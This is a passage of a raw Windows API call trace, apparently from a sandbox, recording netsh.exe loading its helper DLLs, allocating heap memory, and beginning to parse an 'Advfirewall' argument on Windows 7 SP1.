dwIndex=0x13, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="wlancfg", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0189.918] _wcsicmp (_String1="wlancfg.dll", _String2="ipxmontr.dll") returned 14 [0189.918] _wcsicmp (_String1="wlancfg.dll", _String2="ipxpromn.dll") returned 14 [0189.918] GetProcessHeap () returned 0x270000 [0189.918] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x348) returned 0x2c4e60 [0189.918] GetProcessHeap () returned 0x270000 [0189.918] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x10) returned 0x2b7970 [0189.918] GetProcessHeap () returned 0x270000 [0189.918] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2b79b0 [0189.918] _wcsupr (in: _String="wlancfg.dll" | out: _String="WLANCFG.DLL") returned="WLANCFG.DLL" [0189.918] GetProcessHeap () returned 0x270000 [0189.918] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bd140 | out: hHeap=0x270000) returned 1 [0189.918] LoadLibraryW (lpLibFileName="WLANCFG.DLL") returned 0x7fef2800000 [0191.760] GetProcAddress (hModule=0x7fef2800000, lpProcName="InitHelperDll") returned 0x7fef280613c [0191.761] InitHelperDll () returned 0x0 [0191.761] RegisterHelper () returned 0x0 [0191.761] GetProcessHeap () returned 0x270000 [0191.761] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x11e0) returned 0x2ccfe0 [0191.761] GetProcessHeap () returned 0x270000 [0191.761] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cae50 | out: hHeap=0x270000) returned 1 [0191.761] RegEnumValueW (in: hKey=0x90, dwIndex=0x14, lpValueName=0x292310, lpcchValueName=0x247660, lpReserved=0x0, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8 | out: lpValueName="peerdistsh", lpcchValueName=0x247660, lpType=0x0, lpData=0x28e060, lpcbData=0x2476a8) returned 0x0 [0191.761] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxmontr.dll") returned 7 [0191.761] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxpromn.dll") returned 7 [0191.761] GetProcessHeap () returned 0x270000 [0191.761] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x370) returned 0x2c51b0 [0191.761] GetProcessHeap () returned 0x270000 [0191.761] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x16) returned 0x2b79d0 [0191.761] GetProcessHeap () returned 0x270000 [0191.761] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1e) returned 0x2c2fa0 [0191.761] _wcsupr (in: _String="peerdistsh.dll" | out: _String="PEERDISTSH.DLL") returned="PEERDISTSH.DLL" [0191.761] GetProcessHeap () returned 0x270000 [0191.761] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2c4e60 | out: hHeap=0x270000) returned 1 [0191.761] LoadLibraryW (lpLibFileName="PEERDISTSH.DLL") returned 0x7fef2710000 [0192.102] GetProcAddress (hModule=0x7fef2710000, lpProcName="InitHelperDll") returned 0x7fef278e69c [0192.102] InitHelperDll () returned 0x0 [0192.150] RegisterHelper () returned 0x0 [0192.150] GetProcessHeap () returned 0x270000 [0192.150] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1238) returned 0x2ce1d0 [0192.150] GetProcessHeap () returned 0x270000 [0192.150] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ccfe0 | out: hHeap=0x270000) returned 1 [0192.150] RegisterHelper () returned 0x0 [0192.150] GetProcessHeap () returned 0x270000 [0192.150] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1290) returned 0x2cf410 [0192.151] GetProcessHeap () returned 0x270000 [0192.151] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ce1d0 | out: hHeap=0x270000) returned 1 [0192.151] RegCloseKey (hKey=0x90) returned 0x0 [0192.151] GetProcessHeap () returned 0x270000 [0192.151] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x292310 | out: hHeap=0x270000) returned 1 [0192.151] GetProcessHeap () returned 0x270000 [0192.151] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28e060 | out: hHeap=0x270000) returned 1 [0192.152] GetProcessHeap () returned 0x270000 [0192.152] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x70) returned 0x29c000 [0192.152] GetProcessHeap () returned 0x270000 [0192.152] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0192.152] RegisterContext () returned 0x0 [0192.154] GetProcessHeap () returned 0x270000 [0192.155] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x70) returned 0x29c080 [0192.155] GetProcessHeap () returned 0x270000 [0192.155] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0192.225] RegisterContext () returned 0x0 [0192.226] GetProcessHeap () returned 0x270000 [0192.226] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x70) returned 0x29c100 [0192.226] GetProcessHeap () returned 0x270000 [0192.226] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0192.226] RegisterContext () returned 0x0 [0192.227] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0192.227] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0192.227] GetProcessHeap () returned 0x270000 [0192.227] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xe0) returned 0x2ba4d0 [0192.227] GetProcessHeap () returned 0x270000 [0192.227] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c100 | out: hHeap=0x270000) returned 1 [0192.228] RegisterContext () returned 0x0 [0192.228] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0192.228] _wcsicmp (_String1="aaaa", _String2="ipv6") returned -8 [0192.229] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0192.229] GetProcessHeap () returned 0x270000 [0192.229] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x150) returned 0x2bd880 [0192.229] GetProcessHeap () returned 0x270000 [0192.229] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ba4d0 | out: hHeap=0x270000) returned 1 [0192.229] RegisterContext () returned 0x0 [0192.230] GetProcessHeap () returned 0x270000 [0192.230] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1c0) returned 0x2cb090 [0192.230] GetProcessHeap () returned 0x270000 [0192.230] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bd880 | out: hHeap=0x270000) returned 1 [0192.230] RegisterContext () returned 0x0 [0192.230] GetProcessHeap () returned 0x270000 [0192.230] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xe0) returned 0x2ba4d0 [0192.230] GetProcessHeap () returned 0x270000 [0192.230] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c080 | out: hHeap=0x270000) returned 1 [0192.230] RegisterContext () returned 0x0 [0192.231] GetProcessHeap () returned 0x270000 [0192.231] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x150) returned 0x2bd880 [0192.231] GetProcessHeap () returned 0x270000 [0192.231] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ba4d0 | out: hHeap=0x270000) returned 1 [0192.231] RegisterContext () returned 0x0 [0192.231] GetProcessHeap () returned 0x270000 [0192.231] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1c0) returned 0x2cb4e0 [0192.231] GetProcessHeap () returned 0x270000 [0192.231] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bd880 | out: hHeap=0x270000) returned 1 [0192.231] RegisterContext () returned 0x0 [0192.231] GetProcessHeap () returned 0x270000 [0192.231] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x230) returned 0x2cb6b0 [0192.231] GetProcessHeap () returned 0x270000 [0192.231] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cb4e0 | out: hHeap=0x270000) returned 1 [0192.243] RegisterContext () returned 0x0 [0192.243] GetProcessHeap () returned 0x270000 [0192.243] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x2a0) returned 0x2cb8f0 [0192.243] GetProcessHeap () returned 0x270000 [0192.243] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cb6b0 | out: hHeap=0x270000) returned 1 [0192.244] RegisterContext () returned 0x0 [0192.244] GetProcessHeap () returned 0x270000 [0192.244] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x310) returned 0x2cb4e0 [0192.244] GetProcessHeap () returned 0x270000 [0192.244] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cb8f0 | out: hHeap=0x270000) returned 1 [0192.244] RegisterContext () returned 0x0 [0192.244] GetProcessHeap () returned 0x270000 [0192.244] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x70) returned 0x29c080 [0192.244] GetProcessHeap () returned 0x270000 [0192.244] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0192.244] RegisterContext () returned 0x0 [0192.244] GetProcessHeap () returned 0x270000 [0192.244] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xe0) returned 0x2ba4d0 [0192.244] GetProcessHeap () returned 0x270000 [0192.244] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c080 | out: hHeap=0x270000) returned 1 [0192.244] RegisterContext () returned 0x0 [0192.244] GetProcessHeap () returned 0x270000 [0192.244] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x150) returned 0x2bd880 [0192.244] GetProcessHeap () returned 0x270000 [0192.244] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ba4d0 | out: hHeap=0x270000) returned 1 [0192.244] RegisterContext () returned 0x0 [0192.245] GetProcessHeap () returned 0x270000 [0192.245] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1c0) returned 0x2cb800 [0192.245] GetProcessHeap () returned 0x270000 [0192.245] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bd880 | out: hHeap=0x270000) returned 1 [0192.245] RegisterContext () returned 0x0 [0192.245] GetProcessHeap () returned 0x270000 [0192.245] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x380) returned 0x2cb9d0 [0192.245] GetProcessHeap () returned 0x270000 [0192.245] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cb4e0 | out: hHeap=0x270000) returned 1 [0192.245] RegisterContext () returned 0x0 [0192.245] GetProcessHeap () returned 0x270000 [0192.245] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x3f0) returned 0x2d6340 [0192.245] GetProcessHeap () returned 0x270000 [0192.245] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cb9d0 | out: hHeap=0x270000) returned 1 [0192.245] RegisterContext () returned 0x0 [0192.245] GetProcessHeap () returned 0x270000 [0192.245] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x460) returned 0x2cb9d0 [0192.246] GetProcessHeap () returned 0x270000 [0192.246] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d6340 | out: hHeap=0x270000) returned 1 [0192.246] RegisterContext () returned 0x0 [0192.246] GetProcessHeap () returned 0x270000 [0192.246] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x4d0) returned 0x2d6340 [0192.246] GetProcessHeap () returned 0x270000 [0192.246] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cb9d0 | out: hHeap=0x270000) returned 1 [0192.246] RegisterContext () returned 0x0 [0192.246] GetProcessHeap () returned 0x270000 [0192.246] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x70) returned 0x29c080 [0192.246] GetProcessHeap () returned 0x270000 [0192.246] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0192.246] RegisterContext () returned 0x0 [0192.246] GetProcessHeap () returned 0x270000 [0192.246] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xe0) returned 0x2ba4d0 [0192.246] GetProcessHeap () returned 0x270000 [0192.246] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c080 | out: hHeap=0x270000) returned 1 [0192.246] RegisterContext () returned 0x0 [0192.246] GetProcessHeap () returned 0x270000 [0192.246] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x150) returned 0x2bd880 [0192.246] GetProcessHeap () returned 0x270000 [0192.246] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2ba4d0 | out: hHeap=0x270000) returned 1 [0192.247] RegisterContext () returned 0x0 [0192.247] GetProcessHeap () returned 0x270000 [0192.247] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1c0) returned 0x2cb4e0 [0192.248] GetProcessHeap () returned 0x270000 [0192.248] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bd880 | out: hHeap=0x270000) returned 1 [0192.248] RegisterContext () returned 0x0 [0192.248] GetProcessHeap () returned 0x270000 [0192.248] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x230) returned 0x2cb9d0 [0192.248] GetProcessHeap () returned 0x270000 [0192.248] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cb4e0 | out: hHeap=0x270000) returned 1 [0192.249] RegisterContext () returned 0x0 [0192.249] GetProcessHeap () returned 0x270000 [0192.249] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x2a0) returned 0x2cb4e0 [0192.249] GetProcessHeap () returned 0x270000 [0192.249] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cb9d0 | out: hHeap=0x270000) returned 1 [0192.249] RegisterContext () returned 0x0 [0192.249] GetProcessHeap () returned 0x270000 [0192.249] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x70) returned 0x29c080 [0192.249] GetProcessHeap () returned 0x270000 [0192.249] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0192.249] RegisterContext () returned 0x0 [0192.249] GetProcessHeap () returned 0x270000 [0192.249] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xe0) returned 0x2ba4d0 [0192.249] GetProcessHeap () returned 0x270000 [0192.249] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c080 | out: hHeap=0x270000) returned 1 [0192.250] RegisterContext () returned 0x0 [0192.250] RegisterContext () returned 0x0 [0192.250] GetProcessHeap () returned 0x270000 [0192.250] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x310) returned 0x2cb9d0 [0192.250] GetProcessHeap () returned 0x270000 [0192.250] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cb4e0 | out: hHeap=0x270000) returned 1 [0192.250] RegisterContext () returned 0x0 [0192.250] GetProcessHeap () returned 0x270000 [0192.250] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x380) returned 0x2d6820 [0192.250] GetProcessHeap () returned 0x270000 [0192.250] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cb9d0 | out: hHeap=0x270000) returned 1 [0192.250] RegisterContext () returned 0x0 [0192.250] GetProcessHeap () returned 0x270000 [0192.250] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x540) returned 0x2cb9d0 [0192.250] GetProcessHeap () returned 0x270000 [0192.250] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d6340 | out: hHeap=0x270000) returned 1 [0192.250] RegisterContext () returned 0x0 [0192.251] GetProcessHeap () returned 0x270000 [0192.251] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x5b0) returned 0x2d6bb0 [0192.251] GetProcessHeap () returned 0x270000 [0192.251] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2cb9d0 | out: hHeap=0x270000) returned 1 [0192.251] RegisterContext () returned 0x0 [0192.251] GetProcessHeap () returned 0x270000 [0192.251] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x620) returned 0x2d7170 [0192.251] GetProcessHeap () returned 0x270000 [0192.251] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d6bb0 | out: hHeap=0x270000) returned 1 [0192.251] RegisterContext () returned 0x0 [0192.251] GetProcessHeap () returned 0x270000 [0192.251] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x70) returned 0x29c080 [0192.251] GetProcessHeap () returned 0x270000 [0192.251] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0192.251] RegisterContext () returned 0x0 [0192.251] GetProcessHeap () returned 0x270000 [0192.252] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x690) returned 0x2d77a0 [0192.252] GetProcessHeap () returned 0x270000 [0192.252] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d7170 | out: hHeap=0x270000) returned 1 [0192.271] RegisterContext () returned 0x0 [0192.271] GetProcessHeap () returned 0x270000 [0192.271] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x700) returned 0x2df7e0 [0192.271] GetProcessHeap () returned 0x270000 [0192.271] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d77a0 | out: hHeap=0x270000) returned 1 [0193.030] RegisterContext () returned 0x0 [0193.030] GetProcessHeap () returned 0x270000 [0193.030] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x70) returned 0x29c480 [0193.030] GetProcessHeap () returned 0x270000 [0193.030] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0193.038] RegisterContext () returned 0x0 [0193.038] GetProcessHeap () returned 0x270000 [0193.038] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xe0) returned 0x2baa70 [0193.038] GetProcessHeap () returned 0x270000 [0193.038] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c480 | out: hHeap=0x270000) returned 1 [0193.038] RegisterContext () returned 0x0 [0193.038] GetProcessHeap () returned 0x270000 [0193.038] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x770) returned 0x2f7740 [0193.038] GetProcessHeap () returned 0x270000 [0193.038] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2df7e0 | out: hHeap=0x270000) returned 1 [0193.039] RegisterContext () returned 0x0 [0193.039] GetProcessHeap () returned 0x270000 [0193.039] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x70) returned 0x29c480 [0193.039] GetProcessHeap () returned 0x270000 [0193.039] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0193.039] RegisterContext () returned 0x0 [0193.039] GetProcessHeap () returned 0x270000 [0193.039] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xe0) returned 0x2bab60 [0193.039] GetProcessHeap () returned 0x270000 [0193.039] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c480 | out: hHeap=0x270000) returned 1 [0193.039] RegisterContext () returned 0x0 [0193.039] RegisterContext () returned 0x0 [0193.039] RegisterContext () returned 0x0 [0193.039] GetProcessHeap () returned 0x270000 [0193.039] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x7e0) returned 0x2f7ec0 [0193.040] GetProcessHeap () returned 0x270000 [0193.040] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f7740 | out: hHeap=0x270000) returned 1 [0193.333] RegisterContext () returned 0x0 [0193.334] GetProcessHeap () returned 0x270000 [0193.334] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x850) returned 0x2f86b0 [0193.334] GetProcessHeap () returned 0x270000 [0193.334] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f7ec0 | out: hHeap=0x270000) returned 1 [0193.334] RegisterContext () returned 0x0 [0193.334] GetProcessHeap () returned 0x270000 [0193.334] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x8c0) returned 0x2f7d80 [0193.335] GetProcessHeap () returned 0x270000 [0193.335] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f86b0 | out: hHeap=0x270000) returned 1 [0193.335] RegisterContext () returned 0x0 [0193.335] GetProcessHeap () returned 0x270000 [0193.335] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x70) returned 0x29c480 [0193.335] GetProcessHeap () returned 0x270000 [0193.335] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0193.856] RegisterContext () returned 0x0 [0193.857] GetProcessHeap () returned 0x270000 [0193.857] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xe0) returned 0x2bad60 [0193.857] GetProcessHeap () returned 0x270000 [0193.857] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c480 | out: hHeap=0x270000) returned 1 [0193.857] RegisterContext () returned 0x0 [0193.857] GetProcessHeap () returned 0x270000 [0193.857] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x150) returned 0x2f8650 [0193.857] GetProcessHeap () returned 0x270000 [0193.857] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bad60 | out: hHeap=0x270000) returned 1 [0193.857] RegisterContext () returned 0x0 [0193.857] GetProcessHeap () returned 0x270000 [0193.857] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x1c0) returned 0x2f87b0 [0193.858] GetProcessHeap () returned 0x270000 [0193.858] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f8650 | out: hHeap=0x270000) returned 1 [0193.858] RegisterContext () returned 0x0 [0193.858] GetProcessHeap () returned 0x270000 [0193.858] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x70) returned 0x29c480 [0193.858] GetProcessHeap () returned 0x270000 [0193.858] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0193.858] RegisterContext () returned 0x0 [0193.858] GetProcessHeap () returned 0x270000 [0193.858] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xe0) returned 0x2bad60 [0193.858] GetProcessHeap () returned 0x270000 [0193.858] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x29c480 | out: hHeap=0x270000) returned 1 [0193.858] RegisterContext () returned 0x0 [0193.858] GetProcessHeap () returned 0x270000 [0193.858] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x150) returned 0x2f8650 [0193.858] GetProcessHeap () returned 0x270000 [0193.858] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2bad60 | out: hHeap=0x270000) returned 1 [0193.858] RegisterContext () returned 0x0 [0193.859] GetProcessHeap () returned 0x270000 [0193.859] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x70) returned 0x29c480 [0193.859] GetProcessHeap () returned 0x270000 [0193.859] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0193.859] RegisterContext () returned 0x0 [0193.859] GetProcessHeap () returned 0x270000 [0193.859] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x70) returned 0x29c500 [0193.859] GetProcessHeap () returned 0x270000 [0193.859] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0193.859] RegisterContext () returned 0x0 [0193.859] GetProcessHeap () returned 0x270000 [0193.859] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x930) returned 0x2f8980 [0193.860] GetProcessHeap () returned 0x270000 [0193.860] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f7d80 | out: hHeap=0x270000) returned 1 [0193.860] RegisterContext () returned 0x0 [0193.860] GetProcessHeap () returned 0x270000 [0193.860] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x9a0) returned 0x2f92c0 [0193.860] GetProcessHeap () returned 0x270000 [0193.860] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f8980 | out: hHeap=0x270000) returned 1 [0195.131] RegisterContext () returned 0x0 [0195.131] GetProcessHeap () returned 0x270000 [0195.131] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xa10) returned 0x2fde70 [0195.132] GetProcessHeap () returned 0x270000 [0195.132] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2f92c0 | out: hHeap=0x270000) returned 1 [0195.132] RegisterContext () returned 0x0 [0195.132] GetProcessHeap () returned 0x270000 [0195.132] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x70) returned 0x29c680 [0195.132] GetProcessHeap () returned 0x270000 [0195.132] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x270000) returned 1 [0195.132] SetConsoleCtrlHandler (HandlerRoutine=0x1359198, Add=1) returned 1 [0195.132] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77940000 [0195.133] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0195.133] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0195.134] FreeLibrary (hLibModule=0x77940000) returned 1 [0195.134] _wcsicmp (_String1="Advfirewall", _String2="-?") returned 52 [0195.134] _wcsicmp (_String1="Advfirewall", _String2="-h") returned 52 [0195.134] _wcsicmp (_String1="Advfirewall", _String2="?") returned 34 [0195.134] _wcsicmp (_String1="Advfirewall", _String2="/?") returned 50 [0195.134] _wcsicmp (_String1="Advfirewall", _String2="-v") returned 52 [0195.134] _wcsicmp (_String1="Advfirewall", _String2="-a") returned 52 [0195.134] _wcsicmp (_String1="Advfirewall", _String2="-c") returned 52 [0195.134] _wcsicmp (_String1="Advfirewall", _String2="-f") returned 52 [0195.134] _wcsicmp (_String1="Advfirewall", _String2="-r") returned 52 [0195.134] _wcsicmp (_String1="Advfirewall", _String2="-u") returned 52 [0195.134] _wcsicmp (_String1="Advfirewall", _String2="-p") returned 52 [0195.134] GetVersionExW (in: lpVersionInformation=0x2476e0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2476e0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0195.134] _vsnwprintf (in: _Buffer=0x1365b80, _BufferCount=0x103, _Format="%d.%d.%d", _ArgList=0x2476a8 | out: _Buffer="6.1.7601") returned 8 [0195.134] _vsnwprintf (in: _Buffer=0x1365fa0, _BufferCount=0x103, _Format="%d", _ArgList=0x2476a8 | out: _Buffer="7601") returned 4 [0195.134] _vsnwprintf (in: _Buffer=0x1365d90, _BufferCount=0x103, _Format="%d", _ArgList=0x2476a8 | out: _Buffer="1") returned 1 [0195.134] _vsnwprintf (in: _Buffer=0x13661b0, _BufferCount=0x103, _Format="%d", _ArgList=0x2476a8 | out: _Buffer="0") returned 1 [0195.135] GetProcessHeap () returned 0x270000 [0195.135] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2e7100 [0195.135] GetProcessHeap () returned 0x270000 [0195.135] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2e7120 [0195.135] GetProcessHeap () returned 0x270000 [0195.135] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xc) returned 0x2e7140 [0195.135] GetProcessHeap () returned 0x270000 [0195.135] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2e7160 [0195.135] GetProcessHeap () returned 0x270000 [0195.135] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0xc) returned 0x2e7180 [0195.135] wcscpy_s (in: _Destination=0x2e7180, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0195.135] GetProcessHeap () returned 0x270000 [0195.135] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2e7140 | out: hHeap=0x270000) returned 1 [0195.135] GetProcessHeap () returned 0x270000 [0195.135] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2e7120 | out: hHeap=0x270000) returned 1 [0195.135] GetProcessHeap () returned 0x270000 [0195.135] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2e7120 [0195.135] GetProcessHeap () returned 0x270000 [0195.135] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x18) returned 0x2e7140 [0195.135] GetProcessHeap () returned 0x270000 [0195.135] RtlAllocateHeap 